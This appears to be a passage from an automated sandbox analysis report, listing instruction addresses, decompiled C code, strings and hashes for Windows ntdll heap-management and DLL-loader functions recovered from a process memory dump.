                                                                            0x010e22eb
                                                                            0x010e22f0
                                                                            0x010e22c7
                                                                            0x010e22dc
                                                                            0x010e22e1
                                                                            0x010e22e1
                                                                            0x010e22f3
                                                                            0x010e22f8
                                                                            0x010e22fd
                                                                            0x010e2300
                                                                            0x010e2307
                                                                            0x010e230e
                                                                            0x010e230e
                                                                            0x010e2313
                                                                            0x010e2313
                                                                            0x010e22b5
                                                                            0x010e22a2
                                                                            0x0109aafc
                                                                            0x0109a864
                                                                            0x0109a869
                                                                            0x0109aa5c
                                                                            0x0109aa5e
                                                                            0x0109a86f
                                                                            0x0109a87f
                                                                            0x0109a885
                                                                            0x0109a885
                                                                            0x0109a88b
                                                                            0x0109a890
                                                                            0x0109a896
                                                                            0x0109ab0c
                                                                            0x0109ab0f
                                                                            0x0109ab15
                                                                            0x010e2320
                                                                            0x010e2320
                                                                            0x0109ab1b
                                                                            0x0109a89c
                                                                            0x0109a89f
                                                                            0x0109a8a2
                                                                            0x0109a8a2
                                                                            0x0109a8a5
                                                                            0x0109a8af
                                                                            0x0109a8b3
                                                                            0x0109a8b8
                                                                            0x0109aa66
                                                                            0x0109a8be
                                                                            0x0109a8c5
                                                                            0x0109a8c6
                                                                            0x0109a8ce
                                                                            0x010e2328
                                                                            0x010e2332
                                                                            0x010e2337
                                                                            0x010e2337
                                                                            0x0109a8ce
                                                                            0x0109a8d4
                                                                            0x0109a8d8
                                                                            0x0109a8db
                                                                            0x0109a8de
                                                                            0x0109a8e1
                                                                            0x0109a8e5
                                                                            0x0109a8e8
                                                                            0x0109a8f0
                                                                            0x0109a8f3
                                                                            0x010e234c
                                                                            0x010e2350
                                                                            0x010e2355
                                                                            0x010e2359
                                                                            0x010e2359
                                                                            0x0109a8f9
                                                                            0x0109a901
                                                                            0x0109aae4
                                                                            0x0109aae4
                                                                            0x0109aaea
                                                                            0x00000000
                                                                            0x0109a907
                                                                            0x0109a90a
                                                                            0x0109a91d
                                                                            0x0109a91d
                                                                            0x00000000
                                                                            0x0109a910
                                                                            0x0109a910
                                                                            0x0109a910
                                                                            0x0109a914
                                                                            0x0109a924
                                                                            0x0109a924
                                                                            0x0109a924
                                                                            0x0109a924
                                                                            0x0109a916
                                                                            0x0109a91b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a91b
                                                                            0x0109a925
                                                                            0x0109a925
                                                                            0x0109a932
                                                                            0x0109a936
                                                                            0x0109a93c
                                                                            0x0109a93c
                                                                            0x0109a93c
                                                                            0x0109ab22
                                                                            0x0109ab24
                                                                            0x0109ab27
                                                                            0x0109ab27
                                                                            0x0109a942
                                                                            0x0109a944
                                                                            0x0109aaba
                                                                            0x0109aabd
                                                                            0x0109aac0
                                                                            0x0109aac0
                                                                            0x0109aac2
                                                                            0x0109ab2f
                                                                            0x0109aac4
                                                                            0x0109aac4
                                                                            0x0109aac7
                                                                            0x0109aaca
                                                                            0x0109aacc
                                                                            0x0109aace
                                                                            0x0109aace
                                                                            0x0109aace
                                                                            0x0109aad1
                                                                            0x0109aad1
                                                                            0x0109aad7
                                                                            0x0109aad9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2361
                                                                            0x010e2369
                                                                            0x010e236b
                                                                            0x00000000
                                                                            0x010e2371
                                                                            0x00000000
                                                                            0x010e2371
                                                                            0x00000000
                                                                            0x010e236b
                                                                            0x0109aac0
                                                                            0x0109a94a
                                                                            0x0109a94a
                                                                            0x0109a94d
                                                                            0x0109a94d
                                                                            0x0109a950
                                                                            0x0109a954
                                                                            0x010e2376
                                                                            0x010e2380
                                                                            0x0109a95a
                                                                            0x0109a95a
                                                                            0x0109a95c
                                                                            0x0109a95f
                                                                            0x0109a961
                                                                            0x0109a961
                                                                            0x0109a967
                                                                            0x0109a96a
                                                                            0x0109a972
                                                                            0x0109aa02
                                                                            0x0109aa06
                                                                            0x0109aa10
                                                                            0x0109aa16
                                                                            0x0109aa16
                                                                            0x0109aa1b
                                                                            0x0109aa21
                                                                            0x0109aa24
                                                                            0x0109aa27
                                                                            0x0109aa29
                                                                            0x0109aa2c
                                                                            0x0109aa32
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a978
                                                                            0x0109a978
                                                                            0x0109a97b
                                                                            0x0109a981
                                                                            0x0109a996
                                                                            0x0109a998
                                                                            0x0109a99f
                                                                            0x0109a9a2
                                                                            0x010e238a
                                                                            0x0109a9a8
                                                                            0x0109a9a8
                                                                            0x0109a9a8
                                                                            0x0109a9aa
                                                                            0x0109a9ad
                                                                            0x0109a9b0
                                                                            0x0109a9bb
                                                                            0x0109a9be
                                                                            0x0109a9c7
                                                                            0x0109a9c9
                                                                            0x0109a9c9
                                                                            0x0109a9cc
                                                                            0x0109a9d1
                                                                            0x0109aa6d
                                                                            0x0109aa70
                                                                            0x0109aa73
                                                                            0x0109aa75
                                                                            0x0109aa79
                                                                            0x0109aa7e
                                                                            0x0109aa82
                                                                            0x0109aa8f
                                                                            0x0109aa94
                                                                            0x0109aa96
                                                                            0x010e2392
                                                                            0x010e23a1
                                                                            0x010e23a1
                                                                            0x0109aa9c
                                                                            0x0109aa9f
                                                                            0x0109aaa2
                                                                            0x0109aaa2
                                                                            0x0109aaa8
                                                                            0x0109aaab
                                                                            0x0109aaaf
                                                                            0x00000000
                                                                            0x0109aab5
                                                                            0x00000000
                                                                            0x0109aab5
                                                                            0x0109a9d7
                                                                            0x0109a9d7
                                                                            0x0109a9da
                                                                            0x0109a9e0
                                                                            0x0109a9e3
                                                                            0x0109a9e6
                                                                            0x0109a9e9
                                                                            0x0109a9eb
                                                                            0x0109a9fd
                                                                            0x0109a9fd
                                                                            0x00000000
                                                                            0x0109a9eb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a983
                                                                            0x0109a983
                                                                            0x0109a983
                                                                            0x0109a987
                                                                            0x0109a995
                                                                            0x0109a995
                                                                            0x0109a995
                                                                            0x0109a995
                                                                            0x0109a989
                                                                            0x0109a98e
                                                                            0x00000000
                                                                            0x0109a990
                                                                            0x00000000
                                                                            0x0109a990
                                                                            0x0109a98e
                                                                            0x00000000
                                                                            0x0109a983
                                                                            0x0109a972
                                                                            0x0109a90a
                                                                            0x0109aa34
                                                                            0x0109aa34
                                                                            0x0109aa40
                                                                            0x0109aa43
                                                                            0x0109aa46
                                                                            0x0109aa4d
                                                                            0x010e23ab
                                                                            0x010e23b2
                                                                            0x010e23b8
                                                                            0x010e23be
                                                                            0x010e23c3
                                                                            0x010e23c5
                                                                            0x010e23cb
                                                                            0x010e23d1
                                                                            0x010e23d5
                                                                            0x010e23f6
                                                                            0x010e23fb
                                                                            0x010e23d7
                                                                            0x010e23ec
                                                                            0x010e23f1
                                                                            0x010e2403
                                                                            0x010e2408
                                                                            0x010e2410
                                                                            0x010e2417
                                                                            0x010e2422
                                                                            0x010e2422
                                                                            0x010e2417
                                                                            0x010e23c5
                                                                            0x010e23b2
                                                                            0x00000000

                                                                            Strings
                                                                            • HEAP: , xrefs: 010E22E6, 010E23F6
                                                                            • HEAP[%wZ]: , xrefs: 010E22D7, 010E23E7
                                                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010E22F3
                                                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 010E2403
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                            • API String ID: 0-1657114761
                                                                            • Opcode ID: ad29876b63d5a0f39532284e579028692bb43fca6b314926872f28a4ef700cd3
                                                                            • Instruction ID: d4d270293414acf3e1c102db3b435cfbc1dbb084b2a3c360ace992ba08ef455f
                                                                            • Opcode Fuzzy Hash: ad29876b63d5a0f39532284e579028692bb43fca6b314926872f28a4ef700cd3
                                                                            • Instruction Fuzzy Hash: F3D1AD34B00246DFDB19CF69C4A0BAEB7F1BF88200F1585A9D9DA9B746E334A941DB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0109A229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 69%
                                                                            			E0109A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0109DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E010B9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0113A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E010B9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0107B150();
					} else {
						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0107B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E01097D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0113138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E01097D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E01097D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01131582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E01097D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E01097D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01131582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E010CD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                            0x0109a229
                                                                            0x0109a231
                                                                            0x0109a23f
                                                                            0x0109a242
                                                                            0x0109a244
                                                                            0x0109a24c
                                                                            0x0109a255
                                                                            0x0109a25a
                                                                            0x0109a25f
                                                                            0x010e1c76
                                                                            0x010e1c78
                                                                            0x010e1c7e
                                                                            0x010e1c7f
                                                                            0x010e1c81
                                                                            0x010e1c82
                                                                            0x010e1c84
                                                                            0x010e1c89
                                                                            0x010e1c8b
                                                                            0x010e1c9e
                                                                            0x010e1c9e
                                                                            0x010e1cab
                                                                            0x010e1cb2
                                                                            0x00000000
                                                                            0x010e1cb2
                                                                            0x010e1c8d
                                                                            0x010e1c92
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e1c94
                                                                            0x010e1c98
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e1c98
                                                                            0x0109a265
                                                                            0x0109a265
                                                                            0x0109a266
                                                                            0x0109a26f
                                                                            0x0109a270
                                                                            0x0109a276
                                                                            0x0109a277
                                                                            0x0109a279
                                                                            0x0109a27e
                                                                            0x0109a282
                                                                            0x010e1db5
                                                                            0x010e1dbb
                                                                            0x010e1dc1
                                                                            0x010e1dc5
                                                                            0x010e1de4
                                                                            0x010e1de9
                                                                            0x010e1dc7
                                                                            0x010e1ddc
                                                                            0x010e1de1
                                                                            0x010e1def
                                                                            0x010e1df3
                                                                            0x010e1df7
                                                                            0x010e1dfe
                                                                            0x010e1e06
                                                                            0x0109a302
                                                                            0x0109a308
                                                                            0x0109a308
                                                                            0x0109a288
                                                                            0x0109a28d
                                                                            0x0109a294
                                                                            0x010e1cc1
                                                                            0x0109a29a
                                                                            0x0109a29a
                                                                            0x0109a29a
                                                                            0x0109a29f
                                                                            0x010e1ccb
                                                                            0x010e1cd1
                                                                            0x010e1cd8
                                                                            0x010e1cea
                                                                            0x010e1cea
                                                                            0x010e1cd8
                                                                            0x0109a2a9
                                                                            0x0109a2af
                                                                            0x0109a2bc
                                                                            0x010e1cfd
                                                                            0x0109a2c2
                                                                            0x0109a2c2
                                                                            0x0109a2c2
                                                                            0x0109a2c7
                                                                            0x010e1d07
                                                                            0x010e1d0d
                                                                            0x010e1d14
                                                                            0x010e1d1f
                                                                            0x010e1d21
                                                                            0x010e1d2c
                                                                            0x010e1d2c
                                                                            0x010e1d2c
                                                                            0x010e1d47
                                                                            0x010e1d47
                                                                            0x010e1d14
                                                                            0x0109a2cd
                                                                            0x0109a2d2
                                                                            0x0109a2d9
                                                                            0x010e1d5a
                                                                            0x0109a2df
                                                                            0x0109a2df
                                                                            0x0109a2df
                                                                            0x0109a2e4
                                                                            0x010e1d69
                                                                            0x010e1d6b
                                                                            0x010e1d76
                                                                            0x010e1d76
                                                                            0x010e1d76
                                                                            0x010e1d91
                                                                            0x010e1d91
                                                                            0x0109a2ea
                                                                            0x0109a2f0
                                                                            0x0109a2f5
                                                                            0x010e1da8
                                                                            0x010e1dad
                                                                            0x010e1dad
                                                                            0x0109a2fd
                                                                            0x0109a300
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                            • API String ID: 2994545307-2586055223
                                                                            • Opcode ID: f421fa489b815d504943bd8c8cf30613b5646ee52c36f8037a1f8dec8c4f49b9
                                                                            • Instruction ID: 0569841bc29bb749b82c58fda43ccafbbc8100925328f906f314ad010d2e701f
                                                                            • Opcode Fuzzy Hash: f421fa489b815d504943bd8c8cf30613b5646ee52c36f8037a1f8dec8c4f49b9
                                                                            • Instruction Fuzzy Hash: 8951E3322056819FD722EB69C858F6B7BE8FF84750F0804A8F9D5CB291D735D800CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010A8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 44%
                                                                            			E010A8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x116d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1168464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1165780 & 0x00000003) != 0) {
							E010F5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1165780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E010BB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1167984; // 0xc12b20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1168464; // 0x74b10110
					 *0x116b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E010A9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1165780 & 0x00000005) != 0) {
						_push(_t49);
						E010F5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                            0x010a8e0f
                                                                            0x010a8e16
                                                                            0x010a8e19
                                                                            0x010a8e1b
                                                                            0x010a8e21
                                                                            0x010a8e7f
                                                                            0x010a8e85
                                                                            0x010e9354
                                                                            0x010e936c
                                                                            0x010e9371
                                                                            0x010e937b
                                                                            0x010e9381
                                                                            0x010e9381
                                                                            0x010e937b
                                                                            0x010a8e9d
                                                                            0x010a8e9d
                                                                            0x010a8e29
                                                                            0x010a8e2c
                                                                            0x010a8e38
                                                                            0x010a8e3e
                                                                            0x010a8e43
                                                                            0x010a8eb5
                                                                            0x010a8eb9
                                                                            0x010e92aa
                                                                            0x010e92af
                                                                            0x010e92e8
                                                                            0x010e92e8
                                                                            0x010e92af
                                                                            0x010a8eb9
                                                                            0x010a8e45
                                                                            0x010a8e53
                                                                            0x010a8e5b
                                                                            0x010a8e5f
                                                                            0x010a8e78
                                                                            0x010a8e78
                                                                            0x010a8e7d
                                                                            0x010a8ec3
                                                                            0x010a8ecd
                                                                            0x010a8ed2
                                                                            0x010a8ed2
                                                                            0x010a8ec5
                                                                            0x010a8ec5
                                                                            0x00000000
                                                                            0x010a8e7d
                                                                            0x010a8e67
                                                                            0x010a8ea4
                                                                            0x010e931a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e9320
                                                                            0x010a8ea4
                                                                            0x010a8e70
                                                                            0x010e9325
                                                                            0x010e9340
                                                                            0x010e9345
                                                                            0x010e9345
                                                                            0x010a8e76
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            Strings
                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 010E932A
                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 010E9357
                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 010E933B, 010E9367
                                                                            • LdrpFindDllActivationContext, xrefs: 010E9331, 010E935D
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 0-3779518884
                                                                            • Opcode ID: c6011d3f2393d839679064120ea8887896138240bdc6430a391ce449c880f46c
                                                                            • Instruction ID: 05c9e9b2dc870f1d86c20ce7f02d0dc64cd93597def22a99a9354c8d165a4c60
                                                                            • Opcode Fuzzy Hash: c6011d3f2393d839679064120ea8887896138240bdc6430a391ce449c880f46c
                                                                            • Instruction Fuzzy Hash: 4C411731A00311DEDBB6EB9DC84DA7AB6E5AB0034AF86C1BBDBD457151E7715DC08381
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 011349A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                            • API String ID: 2994545307-336120773
                                                                            • Opcode ID: 0ec8f773c775b2d92eb3e501973dd1bb7db7fa3e8fd3530cc6e0e01b94be2da8
                                                                            • Instruction ID: 6c42c62dc4b5c098167b0d142218cf2fdd3a89c18f59ddd93cba44940fe69088
                                                                            • Opcode Fuzzy Hash: 0ec8f773c775b2d92eb3e501973dd1bb7db7fa3e8fd3530cc6e0e01b94be2da8
                                                                            • Instruction Fuzzy Hash: C1316B35100105EFD738DB59C889FABB7E8EF84620F154069F986CB654E771A881CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010999BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 78%
                                                                            			E010999BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0112FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0113A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E010CD540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E0107B150();
										} else {
											E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E0107B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x1166378 = 1;
											asm("int3");
											 *0x1166378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E0109A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E0109A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
